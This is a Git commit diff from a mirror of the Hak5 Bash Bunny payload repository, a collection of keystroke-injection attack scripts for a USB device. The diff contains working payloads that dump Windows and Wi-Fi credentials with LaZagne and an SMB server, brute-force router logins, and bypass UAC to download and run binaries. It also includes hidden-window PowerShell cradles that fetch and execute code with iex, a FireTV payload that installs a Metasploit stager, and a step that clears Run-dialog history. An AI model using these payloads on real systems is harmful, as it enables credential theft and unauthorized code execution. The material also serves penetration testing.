hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update and fix payloads (#277) 

* Updated all Payloads for Version 1.2+

Fixed Style Issues on extensions and payloads.
Added GET TARGET_OS to get.sh
Removed and Fixed all uses ducky_helper.sh (Issue #248)
Removed all mention of DUCKY_LANG (Issue #248)
Renamed Payloads with spaces in name
Added an extension to keep Macs Happy
Added a payload for Mac DNS poisoning
Fixed Issue #271 changed wget to curl -o
Implemented PR #268
Implemented PR #273

* Fixed e.cmd

* Fix e.cmd pt2

* Fixed Issues

Fixed issues pointed out by @sebkinne
Fixed styling errors
pull/270/merge
Aidan Holland 2017-10-24 20:10:17 -04:00 committed by Sebastian Kinne
parent c0ab8d3e88
commit 5a77792c1d
56 changed files with 438 additions and 395 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

40
payloads/extensions/cucumber.sh
View File

@ -1,25 +1,25 @@
#!/bin/bash
function CUCUMBER() {
case $1 in
"ENABLE")
echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
echo 0 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
;;
"DISABLE")
echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
sleep 2
echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
;;
"PLAID")
echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
sleep 2
echo performance | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
;;
*)
LED FAIL
exit 1
esac
case $1 in
"ENABLE")
echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
echo 0 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
;;
"DISABLE")
echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
sleep 2
echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
;;
"PLAID")
echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
sleep 2
echo performance | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
;;
*)
LED FAIL
exit 1
esac
}
export -f CUCUMBER
export -f CUCUMBER

4
payloads/extensions/ducky_lang.sh
View File

@ -1,8 +1,8 @@
#!/bin/bash
function DUCKY_LANG() {
[[ -z "$1" ]] && exit 1 # parameter must be set
[[ -z "$1" ]] && exit 1 # parameter must be set
export DUCKY_LANG="$1"
export DUCKY_LANG="$1"
}
export -f DUCKY_LANG

44
payloads/extensions/get.sh
View File

@ -1,23 +1,31 @@
#!/bin/bash
function GET() {
case $1 in
"TARGET_IP")
export TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq)
;;
"TARGET_HOSTNAME")
export TARGET_HOSTNAME=$(cat /var/lib/dhcp/dhcpd.leases | grep hostname | awk '{print $2 }' | sort | uniq | tail -n1 | sed "s/^[ \t]*//" | sed 's/\"//g' | sed 's/;//')
;;
"HOST_IP")
export HOST_IP=$(cat /etc/network/interfaces.d/usb0 | grep address | awk {'print $2'})
;;
"SWITCH_POSITION")
[[ "$(cat /sys/class/gpio_sw/PA8/data)" == "0" ]] && export SWITCH_POSITION="switch1" && return
[[ "$(cat /sys/class/gpio_sw/PL4/data)" == "0" ]] && export SWITCH_POSITION="switch2" && return
[[ "$(cat /sys/class/gpio_sw/PL3/data)" == "0" ]] && export SWITCH_POSITION="switch3" && return
export SWITCH_POSITION="invalid"
;;
esac
case $1 in
"TARGET_IP")
export TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq)
;;
"TARGET_HOSTNAME")
export TARGET_HOSTNAME=$(cat /var/lib/dhcp/dhcpd.leases | grep hostname | awk '{print $2 }' | sort | uniq | tail -n1 | sed "s/^[ \t]*//" | sed 's/\"//g' | sed 's/;//')
;;
"HOST_IP")
export HOST_IP=$(cat /etc/network/interfaces.d/usb0 | grep address | awk {'print $2'})
;;
"SWITCH_POSITION")
[[ "$(cat /sys/class/gpio_sw/PA8/data)" == "0" ]] && export SWITCH_POSITION="switch1" && return
[[ "$(cat /sys/class/gpio_sw/PL4/data)" == "0" ]] && export SWITCH_POSITION="switch2" && return
[[ "$(cat /sys/class/gpio_sw/PL3/data)" == "0" ]] && export SWITCH_POSITION="switch3" && return
export SWITCH_POSITION="invalid"
;;
"TARGET_OS")
ScanForOS=$(nmap -Pn -O $TARGET_IP -p1)
[[ $ScanForOS == *"Too many fingerprints"* ]] && ScanForOS=$(nmap -Pn -O --osscan-guess $TARGET_IP)
[[ $ScanForOS == *"Windows"* ]] && OSfound='WINDOWS' && return
[[ $ScanForOS == *"Linux"* ]] && OSfound='LINUX' && return
[[ $ScanForOS == *"Apple"* ]] && OSfound='MACOS' && return
export TARGET_OS='UNKNOWN'
;;
esac
}
export -f GET
export -f GET

26
payloads/extensions/mac_happy.sh Normal file
View File

@ -0,0 +1,26 @@
#!/bin/bash
#Title: Mac_Happy
# Author: thehappydinoa
# Target: Mac
# Version: 0.1
#
# Makes Mac happy by correctly setting pid and vid
# Use by running mac_happy ATTACKMODE HID <attack modes here>
#
function mac_happy() {
[[ -z "$1" ]] && exit 1 # parameter must be set
[[ ! $1 =~ "ATTACKMODE" ]] && exit 1 # parameter must be for ATTACKMODE
for i in $*;
do
command=$(echo $command $i)
done
command=$(echo $command VID_0X05AC PID_0X021E)
eval $command
}
export -f mac_happy

10
payloads/extensions/requiretool.sh
View File

@ -8,11 +8,11 @@
# REQUIRETOOL impacket
function REQUIRETOOL() {
[[ -z "$1" ]] && exit 1 # parameter must be set
[[ -z "$1" ]] && exit 1 # parameter must be set
if [ ! -d /tools/$1/ ]; then
LED FAIL
exit 1
fi
if [ ! -d /tools/$1/ ]; then
LED FAIL
exit 1
fi
}
export -f REQUIRETOOL

11
payloads/extensions/run.sh
View File

@ -13,9 +13,9 @@
function RUN() {
local os=$1
shift
[[ -z "$os" || -z "$*" ]] && exit 1 # Both OS and Command parameter must be set
case "$os" in
WIN)
QUACK GUI r
@ -37,6 +37,13 @@ function RUN() {
QUACK DELAY 500
QUACK ENTER
;;
LINUX)
QUACK ALT F2
QUACK DELAY 500
QUACK STRING "$@"
QUACK DELAY 500
QUACK ENTER
;;
*)
# OS parameter must be one of the above
exit 1

60
payloads/extensions/setkb.sh
View File

@ -7,45 +7,45 @@
# Examples:
# SETKB START (set the keyboard layout to a US keyboard layout)
# SETKB DONE (set the keyboard layout to the default keyboard determined by the OS language settings)
# SETKB xx-XX (overwrite the keyboard layout to whatever keyboard layout you need, you will need the [lanugage].json file to run Ducky scripts)
# SETKB xx-XX (overwrite the keyboard layout to whatever keyboard layout you need, you will need the [lanugage].json file to run Ducky scripts)
function SETKB() {
local state=$1
shift
[[ -z "$state" ]] && exit 1 # state keyboard parameter must be given.
case "$state" in
'START')
QUACK GUI r
QUACK DELAY 500
QUACK STRING "powershell.exe Set-WinUserLanguageList -LanguageList en-US -force;"
QUACK ENTER
QUACK DELAY 1500
local state=$1
shift
;;
'DONE')
QUACK GUI r
QUACK DELAY 500
QUACK "STRING powershell.exe \$sl=(Get-WinSystemLocale | Select -ExpandProperty Name) ; Set-WinUserLanguageList -LanguageList \$sl -force; "
QUACK ENTER
QUACK DELAY 1500
[[ -z "$state" ]] && exit 1 # state keyboard parameter must be given.
;;
*)
QUACK GUI r
QUACK DELAY 500
QUACK "STRING powershell.exe Set-WinUserLanguageList -LanguageList $state -force"
QUACK ENTER
QUACK DELAY 1500
case "$state" in
'START')
QUACK GUI r
QUACK DELAY 500
QUACK STRING "powershell.exe Set-WinUserLanguageList -LanguageList en-US -force;"
QUACK ENTER
QUACK DELAY 1500
;;
;;
'DONE')
QUACK GUI r
QUACK DELAY 500
QUACK "STRING powershell.exe \$sl=(Get-WinSystemLocale | Select -ExpandProperty Name) ; Set-WinUserLanguageList -LanguageList \$sl -force; "
QUACK ENTER
QUACK DELAY 1500
;;
*)
QUACK GUI r
QUACK DELAY 500
QUACK "STRING powershell.exe Set-WinUserLanguageList -LanguageList $state -force"
QUACK ENTER
QUACK DELAY 1500
;;
esac
esac
}
export -f SETKB

15
payloads/library/Incident_Response/Hidden_Images/payload.txt
View File

@ -1,12 +1,7 @@
LED R B 100
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
DUCKY_LANG gb
LED B
RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
LED G FAST
#Green means good to go
LED SETUP
RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\run.ps1')"
LED ATTACK

7
payloads/library/Incident_Response/Link_File_analysis/payload.txt Normal file
View File

@ -0,0 +1,7 @@
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
LED SETUP
RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\run.ps1')"
LED ATTACk

0
payloads/library/Incident_Response/Link File analysis/readme.md → payloads/library/Incident_Response/Link_File_analysis/readme.md
View File

0
payloads/library/Incident_Response/Link File analysis/run.ps1 → payloads/library/Incident_Response/Link_File_analysis/run.ps1
View File

12
payloads/library/android/fireytv/payload.txt
View File

@ -11,8 +11,13 @@
# Blue Blinking ...............Running ADB command to push payload.apk
# Red Blinking.......FireTV failed to get an IP address from the Bash Bunny
# Green..............Finished
LED SETUP
GET TARGET_IP
GET SWITCH_POSITION
ATTACKMODE HID
LED R B 0
LED ATTACK
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
@ -64,12 +69,11 @@ Q DELAY 200
Q ESCAPE
ATTACKMODE ECM_ETHERNET
LED B 2000
source bunny_helpers.sh
if [ -z "${TARGET_IP}" ]; then
LED R 2000
LED FAIL
exit 1
fi
adb connect ${TARGET_IP}
adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk
adb shell "am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity"
LED G
LED FINISH

13
payloads/library/credentials/BruteBunny/payload.txt
View File

@ -5,15 +5,14 @@
# Version: 1.0
# Category: Password Recovery
# Target: Windows XP SP3+
#
#
# Description: Will attempt to bruteforce common router username/password combinations in an attempt to gain
# access to the admin panel.
# init
LED R B
LED SETUP
# need SWITCH_POSITION, so give it to me. please. thank you.
source bunny_helpers.sh
GET SWITCH_POSITION
# set up the things to make it do stuff
mkdir -p /root/udisk/BruteBunny/loot
@ -28,12 +27,12 @@ sync;sleep 1;sync
ATTACKMODE HID STORAGE
# wait for storage
LED R G B 100
LED STAGE1
QUACK DELAY 6000
QUACK GUI r
QUACK DELAY 100
# unleash the brute bunny
LED B 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\brutebunny.ps1')"
QUACK ENTER
sleep 10
@ -41,4 +40,4 @@ sleep 10
# sync the stuff
sync;sleep 1;sync
LED G
LED FINISH

58
payloads/library/credentials/DumpCreds/payload.txt
View File

@ -6,23 +6,23 @@
# Build: 1004
# Category: Exfiltration
# Target: Windows Windows 10 (Powershell)
# Attackmodes: HID, Ethernet
# Attackmodes: HID, Ethernet
# !!! works only with Bash Bunny FW 1.1 and up !!!
#
#
# LED Status
# ----------------------- + --------------------------------------------
# SETUP + Setup
#
#
# LED Status
# ----------------------- + --------------------------------------------
# SETUP + Setup
# FAIL + No /tools/impacket/examples/smbserver.py found
# FAIL2 + Target did not acquire IP address
# Yellow single blink + Initialization
# Yellow double blink + HID Stage
# Yellow triple blink + Wait for IP coming up
# Cyan inv single blink + Wait for Handshake (SMBServer Coming up)
# Cyan inv quint blink + Powershell scripts running
# White fast blink + Cleanup, copy Files to <root>/loot
# Green + Finished
# ----------------------- + --------------------------------------------
# FAIL2 + Target did not acquire IP address
# Yellow single blink + Initialization
# Yellow double blink + HID Stage
# Yellow triple blink + Wait for IP coming up
# Cyan inv single blink + Wait for Handshake (SMBServer Coming up)
# Cyan inv quint blink + Powershell scripts running
# White fast blink + Cleanup, copy Files to <root>/loot
# Green + Finished
# ----------------------- + --------------------------------------------
logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 #############################"
@ -30,6 +30,7 @@ logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 #
###### Lets Start ####
LED SETUP
GET SWITCH_POSITION
# Some Variables
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
@ -39,13 +40,13 @@ LOOTDIR=$SWITCHDIR/loot
if [ -f $SWITCHDIR/DEBUG ];then
DEBUG=1 # 1= Debug on / 0= Debug off
tail -f /var/log/syslog > /tmp/log.txt &
else
else
DEBUG=0
fi
mkdir -p $LOOTDIR
mkdir -p $LOOTDIR
REQUIRETOOL impacket
REQUIRETOOL impacket
# remove old Handshake Files
rm -f $SWITCHDIR/CON_*
@ -60,8 +61,8 @@ Q DELAY 5000
# Launch initial cmd
if [ $DEBUG -eq 1 ]; then
RUN WIN cmd
else
RUN WIN cmd
else
RUN WIN cmd /k mode con lines=1 cols=100
fi
@ -69,7 +70,7 @@ fi
Q DELAY 1000
if [ $DEBUG -eq 1 ]; then
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f'-Verb runAs"
else
else
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f /k mode con lines=1 cols=100' -Verb runAs"
fi
Q DELAY 500
@ -77,12 +78,12 @@ Q ENTER
# Bypass UAC :: Change "ALT j" and "ALT n" according to your language i.e. for us it is ALT o (OK) and ALT c (cancel)
# With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD windows opens. The ALT n goes to this Window (doesn't matter) than Enter for Newline
# now the second powershell command goes to the admin cmd windows.
# With no Adminrights the the credentils prompt opens. ALT j doesn't do anything because there are no credentials. Then ALT n cancels the credentials propmpt.
# the second powershell command goes to the cmd Windows I open first.
# With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD windows opens. The ALT n goes to this Window (doesn't matter) than Enter for Newline
# now the second powershell command goes to the admin cmd windows.
# With no Adminrights the the credentils prompt opens. ALT j doesn't do anything because there are no credentials. Then ALT n cancels the credentials propmpt.
# the second powershell command goes to the cmd Windows I open first.
Q DELAY 1000
Q ALT j
Q DELAY 500
@ -109,7 +110,6 @@ logger -t DumpCred_2.1 "### Enter Ethernet Stage ###"
# Ethernet Tage
LED STAGE3
ATTACKMODE RNDIS_ETHERNET
# Source bunny_helpers.sh to get environment variables
logger -t DumpCred_2.1 "### Start SMBServer ###"
# Start SMB Server
@ -149,7 +149,7 @@ logger -t DumpCred_2.1 "### cleanup and copy files ###"
if ! [ -d /root/udisk/loot/DumpCred_2.1 ]; then
mkdir -p /root/udisk/loot/DumpCred_2.1
fi
mv -f $LOOTDIR/* /root/udisk/loot/DumpCred_2.1
mv -f $LOOTDIR/* /root/udisk/loot/DumpCred_2.1
rmdir $LOOTDIR
rm -f $SWITCHDIR/CON_EOF
@ -163,4 +163,4 @@ fi
ATTACKMODE RNDIS_ETHERNET STORAGE
sync; sleep 1; sync
LED FINISH
LED FINISH

5
payloads/library/credentials/MrRobot/payload.txt
View File

@ -14,7 +14,10 @@
# Cyan inverted double blink..Starts server to gets results
# Green..............Got Creds and copied to loot folder
# Red................No Creds
LED SETUP
GET SWITCH_POSITION
# Creating Loot Folders
LOOTDIR=/root/udisk/loot/MrRobot
mkdir -p $LOOTDIR
@ -34,7 +37,7 @@ Q DELAY 500
Q ENTER
Q DELAY 1500
LED STAGE2
LED STAGE2
#Powershell Payload: first wait for connection to bunny webserver, then pull scripts and upload results
Q STRING "powershell -W Hidden \"while (\$true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p.ps1');exit}}\""
Q DELAY 300

2
payloads/library/credentials/PasswordGrabber/e.cmd
View File

@ -11,7 +11,7 @@ REM This executes LaZagne in the current directory and outputs the password file
REM Time and Date is also added
setlocal
cd /d %~dp0
%~dp0\laZagne.exe all > "%~dp0\..\..\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"
%~dp0\laZagne.exe all -vV > "%~dp0\..\..\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"
REM These lines if you just want Passwords and no files.
set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%

5
payloads/library/credentials/PasswordGrabber/payload.txt
View File

@ -6,12 +6,13 @@
# Target: Windows XP SP3+
# Props: Diggster, IMcPwn
# Category: Exfiltration
#
#
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn executes e.cmd invisibly using i.vbs
# which in turn executes and if stated, copies documents to the loot folder on the Bash Bunny.
#
LED SETUP
GET SWITCH_POSITION
LED ATTACK
ATTACKMODE HID STORAGE
RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"

2
payloads/library/credentials/SudoBackdoor/cleaner/payload.txt
View File

@ -24,8 +24,6 @@ else
ATTACKMODE ECM_ETHERNET HID
fi
DUCKY_LANG us
GET SWITCH_POSITION
GET HOST_IP

2
payloads/library/credentials/SudoBackdoor/injector/payload.txt
View File

@ -26,8 +26,6 @@ else
ATTACKMODE ECM_ETHERNET HID
fi
DUCKY_LANG us
GET SWITCH_POSITION
GET HOST_IP

10
payloads/library/credentials/WifiGrabber/payload.txt
View File

@ -22,17 +22,15 @@
ATTACKMODE HID STORAGE
LED R B 200
LED SETUP
LANGUAGE=us
source bunny_helpers.sh
GET SWITCH_POSITION
if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
QUACK ${SWITCH_POSITION}/ducky_script.txt
LED G
LED FINISH
else
LED R
LED FAIL
echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
exit 1
fi

14
payloads/library/execution/exe_UACBypassD&E/payload.txt
View File

@ -2,21 +2,24 @@
# Author: Skiddie
# Version: 1.1
# Target: Windows
#
#
# Download and executes any binary executable with administrator privileges WITHOUT
# prompting the user for administrator rights (aka UAC bypass/exploit)
# Please define URL and SAVEFILENAME in the a.vbs script
# Please define URL and SAVEFILENAME in the a.vbs script
# Target does need internet connection
# Works on Windows 7 - Windows 10
# The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges
# However from what i am aware version 7,8 and 8.1 are still effected
# The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges
# However from what i am aware version 7,8 and 8.1 are still effected
# Currently fastest download and execute for HID attacks to date. (with UAC bypass)
#Define your bunny storage stick name
DRIVER_LABEL='BashBunny'
#RED means starting
LED R
LED SETUP
#Gets File locations
GET SWITCH_POSITION
#We are a keyboard
ATTACKMODE HID STORAGE
@ -32,4 +35,3 @@ LED G
#If you would like to bash bunny to shutdown/exit/dismount from the target system after execution, you can uncomment the lines below
#QUACK DELAY 4500
#shutdown 0

0
payloads/library/execution/psh_DownloadExecSMB/psh.txt → payloads/library/execution/psh_DownloadExec/p.txt Executable file → Normal file
View File

40
payloads/library/execution/psh_DownloadExec/payload.txt
View File

@ -8,51 +8,49 @@
# Attackmodes: HID, RNDIS_ETHERNET
# Firmware: >= 1.3
#
# Quick HID attack to retrieve and run powershell payload from BashBunny web server - ensure psh.txt exists in payload directory
#
# Quick HID attack to retrieve and run powershell payload from BashBunny web server
# ensure p.txt (your powershell payload) exists in payload directory
#
# | Attack Stage | Description |
# | ------------------- | ---------------------------------------- |
# | Stage 1 | Running Initial Powershell Commands |
# | Stage 3 | Delivering powershell payload |
# | Stage 2 | Delivering powershell payload |
#
ATTACKMODE RNDIS_ETHERNET HID
LED SETUP
REQUIRETOOL gohttp
GET HOST_IP
GET SWITCH_POSITION
# Set working dir
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
SERVER_LOG=$PAYLOAD_DIR/server.log
# DEFINE DIRECTORIES
PAYLOAD_DIR=/root/udisk/payloads/${SWITCH_POSITION}
SERVER_LOG=/tmp/server.log
# Fresh Server Log
rm -f $SERVER_LOG
# SERVER LOG
rm -f ${SERVER_LOG}
# Check for gohttp
REQUIRETOOL gohttp
# Start web server
# START HTTP SERVER
iptables -A OUTPUT -p udp --dport 53 -j DROP # disallow outgoing dns requests so server starts immediately
/usr/bin/gohttp -p 80 -d $PAYLOAD_DIR > $SERVER_LOG 2>&1 &
/tools/gohttp/gohttp -p 80 -d /tmp/ > ${SERVER_LOG} 2>&1 &
# Check for psh.txt
if [ ! -f $PAYLOAD_DIR/psh.txt ]; then
# CHECK FOR POWERSHELL
if [ ! -f ${PAYLOAD_DIR}/p.txt ]; then
LED FAIL2
exit 1
fi
cp -R ${PAYLOAD_DIR}/* /tmp/ # any additional assets will be available in tmp
# Attack HID
# STAGE 1 - POWERSHELL
LED STAGE1
# Attack (abbreviations to allow run execution)
RUN WIN "powershell -WindowStyle Hidden \"\$web=New-Object Net.WebClient;while (\$TRUE) {If ((New-Object net.sockets.tcpclient ('$HOST_IP','80')).Connected) {iex \$web.DownloadString('http://$HOST_IP/psh.txt');\$web.DownloadString('http://172.16.64.1/DONE');exit}}\""
RUN WIN "powershell -WindowStyle Hidden \"\$web=New-Object Net.WebClient;while (\$TRUE) {If ((New-Object net.sockets.tcpclient ('${HOST_IP}','80')).Connected) {iex \$web.DownloadString('http://${HOST_IP}/p.txt');\$web.DownloadString('http://172.16.64.1/DONE');exit}}\""
# Remove tracks in the psh payload if you wish
# Attack Ethernet
# STAGE 2 - WAIT
LED STAGE2
while ! grep -Fq "GET \"/DONE\"" $SERVER_LOG; do
while ! grep -Fq "GET \"/DONE\"" ${SERVER_LOG}; do
sleep .5
done

6
payloads/library/execution/psh_DownloadExec/readme.md
View File

@ -14,7 +14,7 @@ Quick HID attack to retrieve and run powershell payload from BashBunny web serve
## Configuration
Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
Ensure p.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
## Requirements
@ -31,5 +31,5 @@ See Hak5's Tool Thread Here: https://forums.hak5.org/index.php?/topic/40971-info
| Attack Stage | Description |
| ------------------- | ---------------------------------------- |
| Stage 1 | Running Initial Powershell Commands |
| Stage 3 | Delivering powershell payload |
```
| Stage 2 | Delivering powershell payload |
```

1
payloads/library/execution/psh_DownloadExec/psh.txt → payloads/library/execution/psh_DownloadExecSMB/p.txt Normal file → Executable file
View File

@ -1,3 +1,2 @@
New-Item $ENV:UserProfile\Desktop\SUCCESS -ItemType file
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue

60
payloads/library/execution/psh_DownloadExecSMB/payload.txt
View File

@ -2,23 +2,23 @@
#
# Title: Powershell Download and Execute SMB
# Author: LowValueTarget
# Version: 1.2
# Version: 2.0
# Category: Powershell
# Target: Windows XP SP3+ (Powershell)
# Attackmodes: HID, RNDIS_ETHERNET
# Firmware: >= 1.2
#
# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot.
# Ensure psh.txt exists in payload directory
# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Possibilities are limitless!
# Credentials captured by are stored as loot.
# Ensure p.txt exists in payload directory (using .txt instead of .ps1 in case of security countermeasures)
#
# Requires Impacket is installed (python ./impacket/setup.py install)
# Required tools: impacket
#
# | Attack Stage | Description |
# | ------------------- | ------------------------------|
# | Stage 1 | Powershell |
# | Stage 2 | Delivering powershell payload |
#
ATTACKMODE RNDIS_ETHERNET HID
# SETUP
@ -29,48 +29,48 @@ GET SWITCH_POSITION
GET TARGET_HOSTNAME
GET HOST_IP
# DEFINE DIRECTORIES
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
# Check for psh.txt
if [ ! -f ${PAYLOAD_DIR}/psh.txt ]; then
LOOTDIR_BB=/root/udisk/loot/psh_DownloadExecSMB
mkdir -p /tmp/{l,p}
# CHECK FOR POWERSHELL
if [ ! -f ${PAYLOAD_DIR}/p.txt ]; then
LED FAIL
exit 1
fi
cp -R ${PAYLOAD_DIR}/* /tmp/
cp -R ${PAYLOAD_DIR}/* /tmp/p/ # any additional assets will be available in tmp
LOOTDIR=/root/udisk/loot/psh_DownloadExecSMB
# Setup named logs in loot directory
mkdir -p ${LOOTDIR}
# GET HOSTNAME
HOST=${TARGET_HOSTNAME}
# If hostname is blank set it to "noname"
[[ -z "$HOST" ]] && HOST="noname"
COUNT=$(ls -lad ${LOOTDIR}/$HOST* | wc -l)
[[ -z "${HOST}" ]] && HOST="noname"
COUNT=$(ls -lad ${LOOTDIR_BB}/${HOST}* | wc -l)
COUNT=$((COUNT+1))
mkdir -p ${LOOTDIR}/${HOST}-$COUNT
mkdir -p ${LOOTDIR_BB}/${HOST}-${COUNT}
LOOTDIR_BB=${LOOTDIR_BB}/${HOST}-${COUNT}
# Log file
LOGFILE=psh_smb.log
# START SMB SERVER
LOGFILE=/tmp/l/psh_downloadsmb.log
touch ${LOGFILE}
python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp > ${LOGFILE} &
# Start SMB Server
mkdir -p /loot
python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp/ > /loot/${LOGFILE} &
# STAGE 1 - Powershell
# STAGE 1 - POWERSHELL
LED STAGE1
RUN WIN "powershell -WindowStyle Hidden \"while (\$true) {If ((New-Object net.sockets.tcpclient(${HOST_IP},445)).Connected) {iex (New-Object Net.WebClient).DownloadString('\\\\${HOST_IP}\\s\\p\\p.txt');New-Item \\\\${HOST_IP}\\s\\COMPLETE -ItemType file;exit}}\""
# TIP: To exfil any data, upload to \\172.16.64.1\s\l\ -- this will be copied to the BB as loot
# TIP: Remove tracks in the psh payload if you wish
RUN WIN "powershell -WindowStyle Hidden \"while (\$true) { If ((New-Object net.sockets.tcpclient ($HOST_IP,445)).Connected) { iex (New-Object Net.WebClient).DownloadString('\\\\$HOST_IP\\s\\psh.txt');New-Item \\\172.16.64.1\\s\\COMPLETE -ItemType file;exit}}\""
# Remove tracks in the psh payload if you wish
# STAGE 2 - Wait until payload retrieved
# Wait until payload is retrieved
# STAGE 2 - HURRY UP AND WAIT
LED STAGE2
while ! [ -f /tmp/COMPLETE ]; do sleep 0.5; done
# CLEANUP
LED CLEANUP
# Move loot to mass storage
mv /loot/${LOGFILE} ${LOOTDIR}/${HOST}-$COUNT
rm /loot/${LOGFILE}
# STASH THE LOOT
mv /tmp/l/* ${LOOTDIR_BB}/
rm -rf /tmp/{l,p}
# Sync file system
sync

12
payloads/library/execution/psh_DownloadExecSMB/readme.md
View File

@ -10,16 +10,20 @@
## Description
Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot.
Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. SMB Credentials are stored as loot.
## Configuration
* Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
* Requires Impacket is installed (python ./impacket/setup.py install)
* Ensure p.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
* Requires Impacket
__Installation__
See Hak5's Tool Thread Here: https://forums.hak5.org/index.php?/topic/40971-info-tools/
## STATUS
| Attack Stage | Description |
| ------------------- | ------------------------------|
| Stage 1 | Powershell |
| Stage 2 | Delivering powershell payload |
| Stage 2 | Delivering powershell payload |

13
payloads/library/exfiltration/BlackBackup/payload.txt
View File

@ -2,7 +2,7 @@
# Author: JWHeuver & JBaselier
# Version: 1.0
#
# Runs powershell script to get Wlan and logon credentials
# Runs powershell script to get Wlan and logon credentials
# from computer and save them on USB drive (Storage attack)
#
# Purple.............Loading
@ -14,19 +14,18 @@
# OPTIONS - More options available in the Powershell payload
OBFUSCATECMD="N" # Y=yes or N=no
# Source bunny_helpers.sh to get environment variable and switch_positions
source bunny_helpers.sh
#-----------------------------------
# Purple LED - initializing
LED R B 0
LED SETUP
GET SWITCH_POSITION
# Attackmode HID / Storage
ATTACKMODE HID STORAGE
#-----------------------------------
# Green LED - executing credential_powershell
LED G 0
LED STAGE1
QUACK GUI r
QUACK DELAY 300
@ -57,4 +56,4 @@ QUACK ENTER
#-----------------------------------
# Kill the lights - finished
LED 0
LED FINISH

43
payloads/library/exfiltration/FileInfoExfil/payload.txt
View File

@ -11,49 +11,40 @@
# Purple LED..................Script Started
# Yellow LED..................Ducky Script Started
# Red LED.....................Failed to run Ducky Script, see log file
#
#
# NOTE: p.ps1 MUST be in loot/payloads/ for this to work.
#
LED B R
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
# Set language
QUACK SET_LANGUAGE gb
# Source bunny_helpers.sh to allow the value fo SWITCH_POSITION to be returned
source bunny_helpers.sh
if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
#Call ducky script
LED R G
#Call ducky script
LED STAGE1
QUACK ${SWITCH_POSITION}/ducky_script.txt
QUACK DELAY 10000
LED R G B
LED FINISH
else
LED R
LED FAIL
#Red LED if unable to load script
echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
exit 1

12
